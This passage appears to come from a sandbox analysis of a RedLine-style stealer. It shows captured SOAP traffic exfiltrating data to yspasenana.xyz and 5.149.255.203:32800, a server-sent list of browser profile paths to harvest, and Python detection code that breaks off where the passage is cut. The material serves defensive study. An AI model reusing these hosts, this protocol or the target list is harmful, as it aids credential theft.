Jul 22, 2021 11:39:48.283055067 CEST | 8.8.8.8 | 192.168.2.3 | 0x3714 | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001)

HTTP Request Dependency Graph

• yspasenana.xyz
• 5.149.255.203:32800

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49742 | 212.224.105.105 | 80 | C:\Users\user\AppData\Roaming\1234.exe

Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 11:39:03.171924114 CEST | 6697 | OUT | POST / HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
    Host: yspasenana.xyz
    Content-Length: 144
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
    Connection: Keep-Alive
Jul 22, 2021 11:39:03.220138073 CEST | 6697 | IN | HTTP/1.1 100 Continue
Jul 22, 2021 11:39:03.332592964 CEST | 6699 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 22 Jul 2021 09:39:03 GMT
    Content-Type: text/xml; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Keep-Alive: timeout=3
    Vary: Accept-Encoding
                                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                                              Data Raw: 33 65 34 0d 0a 1f 8b 08 00 00 00 00 00 02 03 bd 58 6d 8f e2 36 10 fe 2b 11 d2 4a 2d ba 25 5c b7 dd 9e 10 87 c4 4b d8 a2 2e bb 94 70 7b ad 94 2f c6 19 88 8b e3 89 6c 67 03 ab fb f1 75 42 c2 42 ef b6 2a 31 ad 84 48 3c e3 79 32 1e 8f c7 8f dd 55 1d 4f 3c 03 c7 04 9c 6d cc 85 ea a8 8f 8d 48 eb a4 e3 ba 8a 46 10 13 d5 32 72 85 24 69 a1 5c bb f9 8b 0b a5 85 db e8 75 55 67 80 e1 ae d7 35 28 4c a2 88 41 68 1f b4 66 62 ad e6 a0 12 14 aa 04 3e c0 6a 88 93 54 b2 02 ae f1 96 61 ca 75 e9 0f f9 d8 18 48 cc 14 48 6f ab 41 28 86 a2 51 aa d8 01 33 cb b2 56 76 53 40 fe d0 6e bf 77 7f 9f de fb 85 f7 d7 4c 28 4d 04 05 f3 25 d2 19 70 a4 1b 08 87 98 0a 2d 77 25 ca f2 ab 01 c7 8c 4a 54 b8 d2 2d 8a 71 0e 78 e3 be 6f bb 3e 48 46 38 7b 21 da b8 e0 f6 a5 24 3b d5 70 8f 60 27 b3 8b 21 3e 2e ff 04 aa 7f ec 69 99 42 d7 7d 6d 1f 54 b7 bd 15 e1 ea 48 77 9b eb 7c 4a 44 19 2c 75 b0 3d 11 96 9d 86 91 c4 18 2a e9 8c e8 48 5d c2 f7 5e 77 d9 51 5a 9a 39 ec 5d 7d f2 bd f9 6c fe 38 9e dc 7b 57 41 3f 49 46 44 93 e0 1e 29 e1 c1 80 68 cd a1 25 40 77 dd 83 c1 bf 33 2d 1c 67 69 1c 7c 32 8e 3b b9 e2 6c 88 3b c4 35 87 3d 12 58 e3 7c b7 fd 70 fb bd 0d d8 1c 49 6c b4 c1 63 02 92 38 be 89 73 46 24 04 67 bb 33 25 09 07 5f a7 21 c3 d2 9d 19 4f 95 c5 f8 26 92 85 76 91 fe d9 d7 44 96 ff f5 51 86 a6 32 94 99 6a 83 12 41 88 da 02 e0 89 3d 13 1e 32 0b 84 5f cd 9c 98 46 7d 00 8f 43 5e 26 95 63 1f 0e 2f 61 d4 99 49 33 26 ba bb 00 5c 3a c4 97 29 84 cc 8c 4e 12 61 01 34 06 21 99 74 26 82 06 3e 07 96 08 26 7f 0a d4 7e 5f 08 62 0c 53 0e ea 50 04 9e 18 64 20 cf 4f 05 f3 ca 99 20 77 12 d3 24 18 32 63 81 36 99 85 98 a1 a8 1e f5 71 38 83 25 b1 71 e4 37 b3 01 f9 a9 5c 59 40 3c ca 25 d3 56 6b 7e 88 66 96 30 18 49 b2 b6 8a 46 3f 66 eb 7d 30 2c 40 16 28 69 64 61 ff 07 11 21 6c cb c7 05 6a d0 3e 36 f5 01 6e 6e db 95 17 f6 de 4c c9 56 47 28 
6e 6c 2a da f5 d4 10 41 9b 69 f6 93 54 0b b6 39 3c eb 23 3d 30 6a bb a3 0f 91 9a df 05 42 6b 59 04 8b fa 66 97 29 53 c2 78 6b 9e 06 7d 8d 36 ab 79 20 c9 33 1c 38 49 d1 ba be 40 e6 55 8c 32 f0 c2 b5 cd 84 3d 3c 4d 46 93 be 33 44 99 a0 2c 98 68 25 ba 83 b1 59 fb e0 78 5b 43 ab 18 98 03 c0 f9 a9 a9 81 c4 e7 cf 9d dc 25 1a 17 64 f9 cf bb aa fb 26 0f af 28 fa 88 29 8a 32 7c e5 f9 c7 c2 b2 cf 78 31 3b a1 f9 79 bb 52 31 b3 53 9e 2a 0b c9 b1 fa 3f e1 fd a9 19 49 22 71 65 3e 70 15 8c 40 6d 34 26 5f 9a 2d bd d5 ef 9a ad 10 69 f3 5d 73 03 3b f3 9f 11 ce 41 9b 17 05 10 36 bf b4 bf 1d ea 53 38 a4 69 c1 80 ce 06 74 ff 3e ec 2a 10 77 40 37 f8 ff 1f 84 2a d6 3f c5 17 c6 39 09 c6 4c c2 0a b7 35 ce 0d 9f 89 06 59 cf b4 28 df 80 a2 86 e9 22 4a cd 9e 68 d8 82 0c 6b 58 97 1b e1 84 c2 9e 27 d4 80 f8 90 00 dd aa e2 b8 63 08 e1 6e 59 37 06 0f de e2 ae bf f0 9c 05 d0 48 20 c7 35 33 04 73 c0 09 dd fc 42 b2 1a 78 53 44 41 23 c6 43 c3 ae 0d 5d a5 79 56 a8 60 46 38 38 b9 ea 1b 39 f9 75 06 56 b9 e9 53 09 20 4e 16 71 29 aa 3a e4 25 ea b4 42 ec 45 a5 7e 61 a6 77 2d 4d fb 18 e2 20 2c 3b 3d cd 1e 4e 21 72 41 a9 fb 5c 2c a9 d3 3a 52 c9 ba ee 9b 57 37 6f ea 8a fb 20 a3 ad 6e 8d dc d7 eb a7 de 5f e7 f1 c2 3e 8b 12 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 3e4Xm6+J-%\K.p{/lguBB*1H<y2UO<mHF2r$i\uUg5(LAhfb>jTauHHoA(Q3VvS@nwL(M%p-w%JT-qxo>HF8{!$;p`'!>.iB}mTHw|JD,u=*H]^wQZ9]}l8{WA?IFD)h%@w3-gi|2;l;5=X|pIlc8sF$g3%_!O&vDQ2jA=2_F}C^&c/aI3&\:)Na4!t&>&~_bSPd O w$2c6q8%q7\Y@<%Vk~f0IF?f}0,@(ida!lj>6nnLVG(nl*AiT9<#=0jBkYf)Sxk}6y 38I@U2=<MF3D,h%Yx[C%d&()2|x1;yR1S*?I"qe>p@m4&_-i]s;A6S8it>*w@7*?9L5Y("JhkX'cnY7H 53sBxSDA#C]yV`F889uVS Nq):%BE~aw-M ,;=N!rA\,:RW7o n_>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49744 | 212.224.105.105 | 80 | C:\Users\user\AppData\Roaming\1234.exe

Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 11:39:12.320914984 CEST | 6705 | OUT | POST / HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
    Host: yspasenana.xyz
    Content-Length: 1151249
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
Jul 22, 2021 11:39:12.368823051 CEST | 6705 | IN | HTTP/1.1 100 Continue
Jul 22, 2021 11:39:12.916188002 CEST | 7845 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 22 Jul 2021 09:39:12 GMT
    Content-Type: text/xml; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Keep-Alive: timeout=3
    Vary: Accept-Encoding
    Content-Encoding: gzip
                                                                                                                                                                                              Data Raw: 37 65 0d 0a 1f 8b 08 00 00 00 00 00 02 03 45 ce 51 0a 83 40 0c 04 d0 ab c8 1e c0 fc 2f eb 7e 08 bd 80 9e 40 da 50 05 37 09 3b 69 69 6f af 2d b6 fe 0d 03 f3 98 84 78 91 27 af 6a dc bc ca 2a 88 e8 c2 ec 6e 91 08 d7 99 cb 84 76 ef a1 93 b5 5a ef f4 09 c4 c7 82 42 4e 88 bd de de 39 8d ec 3b b4 54 95 c2 e2 03 c3 54 70 98 7f d1 b9 d8 a3 2e 5f 29 50 4e f4 5b d3 79 23 6f 17 76 26 42 93 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 7eEQ@/~@P7;iio-x'j*nvZBN9;TTp._)PN[y#ov&B0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49745 | 212.224.105.105 | 80 | C:\Users\user\AppData\Roaming\1234.exe

Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 11:39:13.094369888 CEST | 7845 | OUT | POST / HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
    Host: yspasenana.xyz
    Content-Length: 1151241
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
    Connection: Keep-Alive
Jul 22, 2021 11:39:13.144042969 CEST | 7846 | IN | HTTP/1.1 100 Continue
Jul 22, 2021 11:39:13.673022032 CEST | 8989 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 22 Jul 2021 09:39:13 GMT
    Content-Type: text/xml; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Keep-Alive: timeout=3
    Vary: Accept-Encoding
    Content-Encoding: gzip
                                                                                                                                                                                              Data Raw: 31 35 63 0d 0a 1f 8b 08 00 00 00 00 00 02 03 5d 92 51 4b c3 30 10 c7 bf 8a 14 f6 68 d3 6d a0 b4 74 81 cd 4d 11 14 c4 39 f1 c1 97 ac 3d b6 b0 34 29 b9 eb 5a c1 0f 6f 12 db 39 d7 a7 bb ff ff ee 77 b9 26 39 66 2b 7d 04 65 6a b8 ea 2a a5 31 c3 59 b4 27 aa 33 c6 b0 d8 43 25 30 76 3a 1a 51 c7 c6 ee 98 0f 18 f4 1d 2c e2 39 66 0b 53 7e f1 fc 01 68 53 97 82 00 5f 01 6b a3 b1 e7 9d 68 04 55 dd 58 19 28 d1 45 7d a3 a8 9f 2e 66 d1 c2 9a 16 c1 ae 3a 02 8d d2 e8 a8 b7 e4 09 d5 b6 6d dc 4e 03 69 92 24 63 f6 f1 fc b4 0e 67 bd 96 1a 49 e8 02 dc 00 91 fd f2 df 04 1e 7c 36 2f c8 c1 f8 d2 b4 5a 19 51 ce 75 b9 ea 72 76 d2 5d c5 5d 63 2d 68 e2 e3 64 e2 8d 21 75 ce d2 54 42 ea 7b a9 08 2c f3 c2 bf 50 0b f5 62 a4 ab 4c 6f 93 f0 f9 ee 33 d9 15 ad 49 50 83 dc cf 3a 82 b7 7b c1 59 fe 7c 73 bb e3 7e 37 74 cb 6d 25 6d 9b e2 00 14 f6 53 8d 44 51 ba f1 69 9a 32 51 56 52 b3 b2 df 00 d9 4d 0c 1d 7c 8f a8 aa 47 9f 68 8f e8 53 0f 1f 90 3d fd 71 c9 a7 83 ec 62 a7 be 4b 94 5b 05 9c 6c 13 1a 86 dc c7 e7 7f 8d 5d de d2 a5 14 2e da 89 c3 2b 60 7f cf 89 ff 00 2d b9 77 e7 5b 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 15c]QK0hmtM9=4)Zo9w&9f+}ej*1Y'3C%0v:Q,9fS~hS_khUX(E}.f:mNi$cgI|6/ZQurv]]c-hd!uTB{,PbLo3IP:{Y|s~7tm%mSDQi2QVRM|GhS=qbK[l].+`-w[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49748 | 212.224.105.105 | 80 | C:\Users\user\AppData\Roaming\1234.exe

Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 11:39:20.844013929 CEST | 13048 | OUT | POST / HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/VerifyUpdate"
    Host: yspasenana.xyz
    Content-Length: 1151267
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
Jul 22, 2021 11:39:20.891258955 CEST | 13048 | IN | HTTP/1.1 100 Continue
Jul 22, 2021 11:39:21.477404118 CEST | 14184 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 22 Jul 2021 09:39:21 GMT
    Content-Type: text/xml; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Keep-Alive: timeout=3
    Vary: Accept-Encoding
    Content-Encoding: gzip
                                                                                                                                                                                              Data Raw: 37 66 0d 0a 1f 8b 08 00 00 00 00 00 02 03 45 8e cb 0a 83 30 10 45 7f a5 e4 03 9c 7d 48 b3 28 f8 03 82 dd 07 1d 1f 60 32 43 6e 2a f5 ef 6b 45 db dd e5 c0 39 5c 07 5b a7 95 17 51 be bd e3 92 60 71 37 53 29 6a 89 d0 4d 1c 03 aa 9d 43 82 56 92 47 fa 0e e2 d3 20 e3 1d ec 43 fa cd bb 27 e7 79 d8 5a ed 43 e1 86 a1 92 70 16 7f bd c2 51 5f 79 3e 3a 86 bc a3 cb a5 ff 09 ff 01 0a 0b 8d ee 91 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 7fE0E}H(`2Cn*kE9\[Q`q7S)jMCVG C'yZCpQ_y>:0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.3 | 49751 | 5.149.255.203 | 32800 | C:\Users\user\AppData\Local\Temp\srvs.exe

Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 11:39:44.921303988 CEST | 14205 | OUT | POST / HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
    Host: 5.149.255.203:32800
    Content-Length: 144
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
    Connection: Keep-Alive
Jul 22, 2021 11:39:44.983942032 CEST | 14206 | IN | HTTP/1.1 100 Continue
Jul 22, 2021 11:39:45.058398962 CEST | 14207 | IN | HTTP/1.1 200 OK
    Content-Length: 4750
    Content-Type: text/xml; charset=utf-8
    Server: Microsoft-HTTPAPI/2.0
    Date: Thu, 22 Jul 2021 09:39:39 GMT
                                                                                                                                                                                              Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 4f 62 6a 65 63 74 34 3e 66 61 6c 73 65 3c 2f 61 3a 4f 62 6a 65 63 74 34 3e 3c 61 3a 4f 62 6a 65 63 74 36 3e 66 61 6c 73 65 3c 2f 61 3a 4f 62 6a 65 63 74 36 3e 3c 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 74 72 75 65 3c 2f 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 3c 61 3a 53 63 61 6e 43 68 72 6f 6d 65 42 72 6f 77 73 65 72 73 50 61 74 68 73 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 
67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 42 61 74 74 6c 65 2e 6e 65 74 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 68 72 6f 6d 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 28 78 38 36 29 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 4f 70 65 72 61 20 53 6f 66 74 77 61 72 65 5c 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 4d 61 70 6c 65 53 74 75 64 69 6f 5c 43 68 72 6f 6d 65 50 6c 75 73 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 49 72 69 64 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 37 53 74 61 72 5c 37 53 74 61 72 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 65
                                                                                                                                                                                              Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>false</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Iridium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\7Star\7Star\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Ce


Session ID: 5
Source IP: 192.168.2.3  Source Port: 49753
Destination IP: 5.149.255.203  Destination Port: 32800
Process: C:\Users\user\AppData\Local\Temp\srvs.exe

Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 11:40:01.361423016 CEST | 14220 | OUT | POST / HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
    Host: 5.149.255.203:32800
    Content-Length: 1151929
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
Jul 22, 2021 11:40:01.424666882 CEST | 14220 | IN | HTTP/1.1 100 Continue
Jul 22, 2021 11:40:02.236315966 CEST | 15445 | IN | HTTP/1.1 200 OK
    Content-Length: 147
    Content-Type: text/xml; charset=utf-8
    Server: Microsoft-HTTPAPI/2.0
    Date: Thu, 22 Jul 2021 09:39:56 GMT
    Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


Session ID: 6
Source IP: 192.168.2.3  Source Port: 49754
Destination IP: 5.149.255.203  Destination Port: 32800
Process: C:\Users\user\AppData\Local\Temp\srvs.exe

Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 11:40:02.306895018 CEST | 15446 | OUT | POST / HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
    Host: 5.149.255.203:32800
    Content-Length: 1151921
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
    Connection: Keep-Alive
Jul 22, 2021 11:40:02.369169950 CEST | 15446 | IN | HTTP/1.1 100 Continue
Jul 22, 2021 11:40:02.905472040 CEST | 16605 | IN | HTTP/1.1 200 OK
    Content-Length: 261
    Content-Type: text/xml; charset=utf-8
    Server: Microsoft-HTTPAPI/2.0
    Date: Thu, 22 Jul 2021 09:39:56 GMT
    Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>
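The sessions above are the evidence behind the "Uses known network protocols on non-standard ports" signature: plain HTTP SOAP POSTs from srvs.exe to a bare IP on TCP 32800, each with a body of roughly 1.1 MB (Content-Length 1151929 and 1151921), a SOAPAction in WCF's placeholder namespace http://tempuri.org/, and a Microsoft-HTTPAPI/2.0 server that hands back the operator's collection settings (ScanBrowsers, ScanChromeBrowsersPaths, BlockedCountry/BlockedIP). The following is an added example, not code from the report or from the RedLine sample: it flags request heads that share those traits and parses the EnvironmentSettingsResponse into a usable structure. The two request heads and the settings document are constructed from the captured sessions (the path list is abridged to two entries); the indicator thresholds are assumptions.

```python
"""Triage helpers for the SOAP C2 sessions listed above (added example)."""
import ipaddress
import re
import xml.etree.ElementTree as ET

# Constructed sample input: the head of session 5's first request, plus a
# benign-looking SOAP request to a named host on 443 for contrast.
SAMPLE_REQUESTS = [
    "POST / HTTP/1.1\r\n"
    "Content-Type: text/xml; charset=utf-8\r\n"
    'SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"\r\n'
    "Host: 5.149.255.203:32800\r\n"
    "Content-Length: 1151929\r\n"
    "Expect: 100-continue\r\n"
    "Accept-Encoding: gzip, deflate\r\n\r\n",
    "POST /svc/Orders.svc HTTP/1.1\r\n"
    "Content-Type: text/xml; charset=utf-8\r\n"
    'SOAPAction: "http://erp.example.com/Orders/GetOrder"\r\n'
    "Host: erp.example.com:443\r\n"
    "Content-Length: 812\r\n\r\n",
]
# Operation names seen in the captured SOAPAction headers and responses.
REDLINE_OPERATIONS = {"EnvironmentSettings", "SetEnvironment", "GetUpdates"}


def parse_request(raw):
    """Split an HTTP/1.1 request head into (request line, lower-cased header dict)."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def classify(raw, large_body=512 * 1024):
    """Return the indicators that make a SOAP POST look like the beacon above.
    Assumed thresholds: a body >= 512 KiB is 'large'; only 80/443 count as standard."""
    _, h = parse_request(raw)
    hits = []
    action = h.get("soapaction", "").strip('"')
    if action.startswith("http://tempuri.org/"):       # WCF's default, never-changed namespace
        hits.append("soapaction-default-wcf-namespace")
    m = re.search(r"/Endpoint/(\w+)$", action)
    if m and m.group(1) in REDLINE_OPERATIONS:
        hits.append("redline-operation:" + m.group(1))
    host, _, port = h.get("host", "").partition(":")
    try:
        ipaddress.ip_address(host)                      # raises for a DNS name
        hits.append("host-is-bare-ip")
    except ValueError:
        pass
    if port and port not in ("80", "443"):
        hits.append("non-standard-port:" + port)
    if int(h.get("content-length", "0")) >= large_body:
        hits.append("large-body")
    return hits


# Constructed, abridged copy of the EnvironmentSettingsResponse captured above.
SAMPLE_SETTINGS = (
    '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>'
    '<EnvironmentSettingsResponse xmlns="http://tempuri.org/">'
    '<EnvironmentSettingsResult xmlns:a="BrowserExtension" '
    'xmlns:i="http://www.w3.org/2001/XMLSchema-instance">'
    '<a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/>'
    '<a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/>'
    '<a:ScanBrowsers>true</a:ScanBrowsers>'
    '<a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays">'
    '<b:string>%USERPROFILE%\\AppData\\Local\\Google\\Chrome\\User Data</b:string>'
    '<b:string>%USERPROFILE%\\AppData\\Roaming\\Opera Software\\</b:string>'
    '</a:ScanChromeBrowsersPaths>'
    '</EnvironmentSettingsResult></EnvironmentSettingsResponse></s:Body></s:Envelope>'
)
NS = {"s": "http://schemas.xmlsoap.org/soap/envelope/", "t": "http://tempuri.org/",
      "a": "BrowserExtension", "b": "http://schemas.microsoft.com/2003/10/Serialization/Arrays"}


def parse_environment_settings(xml_text):
    """Pull the operator's collection settings out of an EnvironmentSettingsResponse."""
    root = ET.fromstring(xml_text)
    result = root.find("s:Body/t:EnvironmentSettingsResponse/t:EnvironmentSettingsResult", NS)
    if result is None:
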